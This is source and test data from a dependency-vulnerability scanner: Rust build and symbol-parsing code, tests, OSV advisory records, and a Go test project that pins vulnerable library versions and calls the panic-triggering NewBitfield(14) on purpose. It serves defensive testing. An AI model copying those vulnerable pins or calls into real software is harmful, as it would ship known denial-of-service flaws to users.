header.Name == "//" { // "//" is used in GNU ar format as a store for long file names fileBuf := bytes.Buffer{} // Ignore the error here as it's likely _, err = io.Copy(&fileBuf, reader) if err != nil { return bytes.Buffer{}, fmt.Errorf("failed to read // store in ar archive: %w", err) } filename := strings.TrimSpace(fileBuf.String()) // There should only be one file (since we set codegen-units=1) if !strings.HasSuffix(filename, RustLibExtension) { // TODO: Verify this, and return an error here instead. cmdlogger.Warnf("rlib archive contents were unexpected: %s\n", filename) } } // /0 indicates the first file mentioned in the "//" store if header.Name == "/0" || strings.HasSuffix(header.Name, RustLibExtension) { break } } _, err = io.Copy(&buf, reader) if err != nil { return bytes.Buffer{}, fmt.Errorf("failed to read from archive '%s': %w", rlibPath, err) } return buf, nil } func rustBuildSource(source models.SourceInfo) ([]string, error) { projectBaseDir := filepath.Dir(source.Path) // TODO: This will be moved to enrichers which does have context. cmd := exec.CommandContext(context.TODO(), "cargo", "build", "--workspace", "--all-targets", "--release") cmd.Env = append(cmd.Environ(), RustFlagsEnv) cmd.Dir = projectBaseDir if errors.Is(cmd.Err, exec.ErrDot) { cmd.Err = nil } stdoutBuffer := bytes.Buffer{} stderrBuffer := bytes.Buffer{} cmd.Stdout = &stdoutBuffer cmd.Stderr = &stderrBuffer cmdlogger.Infof("Begin building rust/cargo project") if err := cmd.Run(); err != nil { cmdlogger.Errorf("cargo stdout:\n%s", stdoutBuffer.String()) cmdlogger.Errorf("cargo stderr:\n%s", stderrBuffer.String()) return nil, fmt.Errorf("failed to run `%v`: %w", cmd.String(), err) } outputDir := filepath.Join(projectBaseDir, "target", "release") entries, err := os.ReadDir(outputDir) if err != nil { return nil, fmt.Errorf("failed to read \"%s\" dir: %w", outputDir, err) } resultBinaryPaths := []string{} for _, de := range entries { // We only want .d files, which is generated for each output binary from cargo // These files contains a string to the full path of output binary/library file. // This is a reasonably reliable way to identify the output in a cross-platform way. if de.IsDir() || !strings.HasSuffix(de.Name(), ".d") { continue } file, err := os.ReadFile(filepath.Join(outputDir, de.Name())) if err != nil { return nil, fmt.Errorf("failed to read \"%s\": %w", filepath.Join(outputDir, de.Name()), err) } fileSplit := strings.Split(string(file), ": ") if len(fileSplit) != 2 { // TODO: this can probably be fixed with more effort return nil, errors.New("file path contains ': ', which is unsupported") } resultBinaryPaths = append(resultBinaryPaths, fileSplit[0]) } return resultBinaryPaths, nil } // cleanRustFunctionSymbols takes in demanged rust symbols and makes them fit format of // the common function level advisory information func cleanRustFunctionSymbols(val string) string { // Used to remove generics from functions and types as they are not included in function calls // in advisories: // E.g.: `smallvec::SmallVec::new` => `smallvec::SmallVec::new` // // Usage: antiGenericRegex.ReplaceAllString(val, "") var antiGenericRegex = cachedregexp.MustCompile(`<[\w,]+>`) val = antiGenericRegex.ReplaceAllString(val, "") // Used to remove fully qualified trait implementation indicators from the function type, // since those are generally not included in advisory: // E.g.: `::read` => `libflate::gzip::MultiDecoder::read` var antiTraitImplRegex = cachedregexp.MustCompile(`<(.*) as .*>`) val = antiTraitImplRegex.ReplaceAllString(val, "$1") return val } ================================================ FILE: internal/sourceanalysis/rust_test.go ================================================ package sourceanalysis import ( "bytes" "os" "path/filepath" "reflect" "strings" "testing" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/google/osv-scanner/v2/pkg/models" ) func Test_extractRlibArchive(t *testing.T) { t.Parallel() entries, err := os.ReadDir("testdata/rust/archives") if err != nil { t.Error(err) } for _, file := range entries { filename := file.Name() t.Run("Extract Rlib "+filename, func(t *testing.T) { t.Parallel() buf, err := extractRlibArchive(filepath.Join("testdata/rust/archives", filename)) if err != nil { t.Error(err) } expectedFileName := strings.Replace(filename, ".rlib", ".o", 1) expectedBuf, err := os.ReadFile(filepath.Join("testdata/rust/objs", expectedFileName)) if err != nil { t.Error(err) } if !bytes.Equal(buf.Bytes(), expectedBuf) { t.Fatalf("Extracted not identical to expected: %s", filepath.Join("testdata/rust/archives", filename)) } }) } } func Test_functionsFromDWARF(t *testing.T) { t.Parallel() entries, err := os.ReadDir("testdata/rust/objs") if err != nil { t.Error(err) } for _, file := range entries { filename := file.Name() t.Run("Parsing DWARF "+filename, func(t *testing.T) { t.Parallel() buf, err := os.ReadFile(filepath.Join("testdata/rust/objs", filename)) if err != nil { t.Error(err) } functions, err := functionsFromDWARF(bytes.NewReader(buf)) if err != nil { t.Error(err) } testutility.NewSnapshot().MatchJSON(t, functions) }) } } func Test_rustBuildSource(t *testing.T) { testutility.SkipIfNotAcceptanceTesting(t, "Requires rust toolchain to be installed") testutility.SkipIfShort(t) t.Parallel() cwd := testutility.GetCurrentWorkingDirectory(t) type args struct { source models.SourceInfo } tests := []struct { name string args args want []string wantErr bool }{ { args: args{ source: models.SourceInfo{ Path: "testdata/rust/rust-project/Cargo.lock", Type: "lockfile", }, }, want: []string{ cwd + filepath.FromSlash("/testdata/rust/rust-project/target/release/test-project") + testutility.ValueIfOnWindows(".exe", ""), }, }, } for _, tt := range tests { got, err := rustBuildSource(tt.args.source) if (err != nil) != tt.wantErr { t.Errorf("rustBuildSource() error = %v, wantErr %v", err, tt.wantErr) return } if !reflect.DeepEqual(got, tt.want) { t.Errorf("rustBuildSource() = %v, want %v", got, tt.want) } } } ================================================ FILE: internal/sourceanalysis/sourceanalysis.go ================================================ package sourceanalysis import ( "path/filepath" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvschema" ) // vulnsFromAllPkgs returns the flattened list of unique vulnerabilities func vulnsFromAllPkgs(pkgs []models.PackageVulns) ([]*osvschema.Vulnerability, map[string]*osvschema.Vulnerability) { flatVulns := map[string]*osvschema.Vulnerability{} for _, pv := range pkgs { for _, vuln := range pv.Vulnerabilities { flatVulns[vuln.GetId()] = vuln } } vulns := make([]*osvschema.Vulnerability, 0, len(flatVulns)) for _, v := range flatVulns { vulns = append(vulns, v) } return vulns, flatVulns } // Run runs the language specific analyzers on the code given packages and source info func Run(source models.SourceInfo, pkgs []models.PackageVulns, callAnalysis map[string]bool) { // GoVulnCheck if source.Type == "lockfile" && filepath.Base(source.Path) == "go.mod" && callAnalysis["go"] { goAnalysis(pkgs, source) } if source.Type == "lockfile" && filepath.Base(source.Path) == "Cargo.lock" && callAnalysis["rust"] { rustAnalysis(pkgs, source) } } ================================================ FILE: internal/sourceanalysis/testdata/go-integration/.goignore ================================================ test-project ================================================ FILE: internal/sourceanalysis/testdata/go-integration/GO-2021-0053.json ================================================ { "id": "GO-2021-0053", "published": "2021-04-14T20:04:52Z", "modified": "2023-02-10T16:51:38Z", "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "affected": [ { "package": { "name": "github.com/gogo/protobuf", "ecosystem": "Go" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, "ecosystem_specific": { "imports": [ { "path": "github.com/gogo/protobuf/plugin/unmarshal", "symbols": [ "unmarshal.Generate", "unmarshal.field" ] } ] } } ], "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ], "schema_version": "1.3.1" } ================================================ FILE: internal/sourceanalysis/testdata/go-integration/GO-2023-1558.json ================================================ { "id": "GO-2023-1558", "published": "2023-02-14T19:41:21Z", "modified": "2023-02-14T19:41:21Z", "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "affected": [ { "package": { "name": "github.com/ipfs/go-bitfield", "ecosystem": "Go" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ] } ], "database_specific": { "url": "https://pkg.go.dev/vuln/GO-2023-1558" }, "ecosystem_specific": { "imports": [ { "path": "github.com/ipfs/go-bitfield", "symbols": [ "FromBytes", "NewBitfield" ] } ] } } ], "references": [ { "type": "ADVISORY", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ], "credits": [ { "name": "Jorropo" } ], "schema_version": "1.3.1" } ================================================ FILE: internal/sourceanalysis/testdata/go-integration/GO-2023-2382.json ================================================ { "schema_version": "1.3.1", "id": "GO-2023-2382", "modified": "2023-12-06T16:22:36Z", "published": "2023-12-06T16:22:36Z", "aliases": [ "CVE-2023-39326" ], "summary": "Denial of service via chunk extensions in net/http", "details": "A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body.\n\nA malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request.\n\nChunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.", "affected": [ { "package": { "name": "stdlib", "ecosystem": "Go" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.20.12" }, { "introduced": "1.21.0-0" }, { "fixed": "1.21.5" } ] } ], "ecosystem_specific": { "imports": [ { "path": "net/http/internal", "symbols": [ "chunkedReader.Read", "chunkedReader.beginChunk", "readChunkLine" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/64433" }, { "type": "FIX", "url": "https://go.dev/cl/547335" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-dev/c/6ypN5EjibjM/m/KmLVYH_uAgAJ" } ], "credits": [ { "name": "Bartek Nowotarski" } ], "database_specific": { "url": "https://pkg.go.dev/vuln/GO-2023-2382" } } ================================================ FILE: internal/sourceanalysis/testdata/go-integration/test-project/go.mod ================================================ module github.com/ossf-tests/osv-e2e go 1.19 require github.com/gogo/protobuf v1.3.1 require github.com/ipfs/go-bitfield v1.0.0 require golang.org/x/image v0.4.0 // indirect ================================================ FILE: internal/sourceanalysis/testdata/go-integration/test-project/go.sum ================================================ github.com/gogo/protobuf v1.3.1 h1:DqDEcV5aeaTmdFBePNpYsp3FlcVH/2ISVVM9Qf8PSls= github.com/gogo/protobuf v1.3.1/go.mod h1:SlYgWuQ5SjCEi6WLHjHCa1yvBfUnHcTbrrZtXPKa29o= github.com/ipfs/go-bitfield v1.0.0 h1:y/XHm2GEmD9wKngheWNNCNL0pzrWXZwCdQGv1ikXknQ= github.com/ipfs/go-bitfield v1.0.0/go.mod h1:N/UiujQy+K+ceU1EF5EkVd1TNqevLrCQMIcAEPrdtus= github.com/kisielk/errcheck v1.2.0/go.mod h1:/BMXB+zMLi60iA8Vv6Ksmxu/1UDYcXs4uQLJ+jE2L00= github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/image v0.4.0 h1:x1RWAiZIvERqkltrFjtQP1ycmiR5pmhjtCfVOtdURuQ= golang.org/x/image v0.4.0/go.mod h1:FVC7BI/5Ym8R25iw5OLsgshdUBbT1h5jZTpA+mvAdZ4= golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= golang.org/x/text v0.7.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20181030221726-6c7e314b6563/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= ================================================ FILE: internal/sourceanalysis/testdata/go-integration/test-project/main.go ================================================ package main import ( "log" "net/http" "github.com/gogo/protobuf/plugin/unmarshal" "github.com/gogo/protobuf/version" "github.com/ipfs/go-bitfield" ) func main() { print(version.AtLeast("v1.2.3")) unmarshal.NewUnmarshal() bitfield.NewBitfield(14) // Test stdlib err := http.ListenAndServe(":8080", nil) if err != nil { log.Fatal(err) } } ================================================ FILE: internal/sourceanalysis/testdata/go-integration/test-project/osv-scanner.toml ================================================ [[PackageOverrides]] name = "github.com/ipfs/go-bitfield" ecosystem = "Go" ignore = true reason = "This is an intentionally vulnerable test project" [[PackageOverrides]] name = "github.com/gogo/protobuf" ecosystem = "Go" ignore = true reason = "This is an intentionally vulnerable test project" [[PackageOverrides]] name = "golang.org/x/image" ecosystem = "Go" ignore = true reason = "This is an intentionally vulnerable test project" [[PackageOverrides]] name = "stdlib" ecosystem = "Go" ignore = true reason = "This is an intentionally vulnerable test project" ================================================ FILE: internal/sourceanalysis/testdata/json/govulncheckinput.json ================================================ { "GHSA-c3h9-896r-86jm": [ { "osv": "GHSA-c3h9-896r-86jm", "trace": [ { "module": "github.com/gogo/protobuf", "version": "v1.3.1", "package": "github.com/gogo/protobuf/proto", "function": "RegisterEnum", "position": { "filename": "/go/pkg/mod/github.com/gogo/protobuf@v1.3.1/proto/properties.go", "offset": 14200, "line": 518, "column": 6 } }, { "module": "github.com/gogo/protobuf", "version": "v1.3.1", "package": "github.com/gogo/protobuf/protoc-gen-gogo/descriptor", "function": "init#1", "position": { "filename": "/go/pkg/mod/github.com/gogo/protobuf@v1.3.1/protoc-gen-gogo/descriptor/descriptor.pb.go", "offset": 98891, "line": 2668, "column": 20 } }, { "module": "github.com/gogo/protobuf", "version": "v1.3.1", "package": "github.com/gogo/protobuf/protoc-gen-gogo/descriptor", "function": "init", "position": { "filename": "/go/pkg/mod/github.com/gogo/protobuf@v1.3.1/protoc-gen-gogo/descriptor/descriptor.go", "offset": 1932, "line": 37, "column": 1 } }, { "module": "github.com/gogo/protobuf", "version": "v1.3.1", "package": "github.com/gogo/protobuf/plugin/unmarshal", "function": "init", "position": { "filename": "/go/pkg/mod/github.com/gogo/protobuf@v1.3.1/plugin/unmarshal/unmarshal.go", "offset": 5007, "line": 184, "column": 2 } }, { "module": "github.com/ossf-tests/osv-e2e", "package": "github.com/ossf-tests/osv-e2e", "function": "init", "position": { "filename": "/Documents/Project/osv-scanner/internal/sourceanalysis/testdata/go-integration/test-project/main.go", "offset": 44, "line": 7, "column": 2 } } ] } ], "GO-2021-0053": [ { "osv": "GO-2021-0053", "fixed_version": "v1.3.2", "trace": [ { "module": "github.com/gogo/protobuf", "version": "v1.3.1" } ] }, { "osv": "GO-2021-0053", "fixed_version": "v1.3.2", "trace": [ { "module": "github.com/gogo/protobuf", "version": "v1.3.1", "package": "github.com/gogo/protobuf/plugin/unmarshal" } ] } ], "GO-2023-1558": [ { "osv": "GO-2023-1558", "fixed_version": "v1.1.0", "trace": [ { "module": "github.com/ipfs/go-bitfield", "version": "v1.0.0" } ] }, { "osv": "GO-2023-1558", "fixed_version": "v1.1.0", "trace": [ { "module": "github.com/ipfs/go-bitfield", "version": "v1.0.0", "package": "github.com/ipfs/go-bitfield" } ] }, { "osv": "GO-2023-1558", "fixed_version": "v1.1.0", "trace": [ { "module": "github.com/ipfs/go-bitfield", "version": "v1.0.0", "package": "github.com/ipfs/go-bitfield", "function": "NewBitfield", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 12, "column": 6 } }, { "module": "github.com/ossf-tests/osv-e2e", "package": "github.com/ossf-tests/osv-e2e", "function": "main", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 16, "column": 22 } } ] } ], "GO-2023-2382": [ { "osv": "GO-2023-2382", "fixed_version": "v1.20.12", "trace": [ { "module": "stdlib", "version": "v1.19.0", "package": "net/http/internal" } ] }, { "osv": "GO-2023-2382", "fixed_version": "v1.20.12", "trace": [ { "module": "stdlib", "version": "v1.19.0", "package": "net/http/internal" } ] }, { "osv": "GO-2023-2382", "fixed_version": "v1.20.12", "trace": [ { "module": "stdlib", "version": "v1.19.0", "package": "net/http/internal", "function": "Read", "receiver": "*chunkedReader", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 97, "column": 26 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "readLocked", "receiver": "*body", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 839, "column": 21 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "Read", "receiver": "bodyLocked", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 1038, "column": 24 } }, { "module": "stdlib", "version": "v1.19.0", "package": "io", "function": "copyBuffer", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 430, "column": 21 } }, { "module": "stdlib", "version": "v1.19.0", "package": "io", "function": "Copy", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 389, "column": 19 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "Close", "receiver": "*body", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 1002, "column": 19 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "finishRequest", "receiver": "*response", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 1670, "column": 17 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "serve", "receiver": "*conn", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 2015, "column": 18 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "Serve", "receiver": "*Server", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 3086, "column": 3 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "ListenAndServe", "receiver": "*Server", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 2985, "column": 18 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "ListenAndServe", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 3239, "column": 30 } }, { "module": "github.com/ossf-tests/osv-e2e", "package": "github.com/ossf-tests/osv-e2e", "function": "main", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 19, "column": 28 } } ] } ] } ================================================ FILE: internal/sourceanalysis/testdata/json/input-no-call-data.json ================================================ [ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "vulnerabilities": [ { "schema_version": "1.3.0", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "aliases": [ "CVE-2021-3121" ], "summary": "Improper Input Validation in GoGo Protobuf", "details": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" } }, { "schema_version": "1.3.0", "id": "GO-2021-0053", "modified": "2023-02-10T16:51:38Z", "published": "2021-04-14T20:04:52Z", "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "summary": "", "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json", "url": "https://pkg.go.dev/vuln/GO-2021-0053" } } ], "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ] } ], "groups": [ { "ids": [ "GHSA-c3h9-896r-86jm", "GO-2021-0053" ] } ] }, { "package": { "name": "github.com/ipfs/go-bitfield", "version": "1.0.0", "ecosystem": "Go" }, "vulnerabilities": [ { "schema_version": "1.3.0", "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-02-10T19:52:45Z", "published": "2023-02-10T19:52:45Z", "aliases": [ "CVE-2023-23626" ], "summary": "IPFS go-bitfield vulnerable to DoS via malformed size arguments", "details": "### Impact\nWhen feeding untrusted user input into the size parameter of `NewBitfield` and `FromBytes` functions, an attacker can trigger `panic`s.\n\nThis happen when the `size` is a not a multiple of `8` or is negative.\nThere were already a note in the `NewBitfield` documentation:\n\u003e ```\n\u003e Panics if size is not a multiple of 8.\n\u003e ````\n\nBut it incomplete and missing from `FromBytes`'s documentation.\n\nThis has been replaced by returning an `(Bitfield, error)` and returning a non nil error if the size is wrong.\n\n### Patches\n- https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\n\n### Workarounds\n- Ensure `size%8 == 0 \u0026\u0026 size \u003e= 0` yourself before calling `NewBitfield` or `FromBytes`\n\n### References\n- https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778\n", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.0" } ] } ], "versions": [ "1.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-2h6c-j3gf-xp9r/GHSA-2h6c-j3gf-xp9r.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23626" }, { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" }, { "type": "PACKAGE", "url": "https://github.com/ipfs/go-bitfield" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } ], "database_specific": { "cwe_ids": [ "CWE-1284", "CWE-754" ], "github_reviewed": true, "github_reviewed_at": "2023-02-10T19:52:45Z", "nvd_published_at": "2023-02-09T21:15:00Z", "severity": "MODERATE" } }, { "schema_version": "1.3.0", "id": "GO-2023-1558", "modified": "2023-02-14T19:41:21Z", "published": "2023-02-14T19:41:21Z", "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "summary": "", "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1558.json", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } } ], "references": [ { "type": "ADVISORY", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ] } ], "groups": [ { "ids": [ "GHSA-2h6c-j3gf-xp9r", "GO-2023-1558" ] } ] }, { "package": { "name": "golang.org/x/image", "version": "0.4.0", "ecosystem": "Go" }, "vulnerabilities": [ { "schema_version": "1.3.0", "id": "GHSA-qgc7-mgm3-q253", "modified": "2023-02-17T13:59:44Z", "published": "2023-02-17T13:59:44Z", "aliases": [ "CVE-2022-41727" ], "summary": "Uncontrolled Resource Consumption", "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-qgc7-mgm3-q253/GHSA-qgc7-mgm3-q253.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41727" }, { "type": "WEB", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://go.dev/issue/58003" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" }, { "type": "WEB", "url": 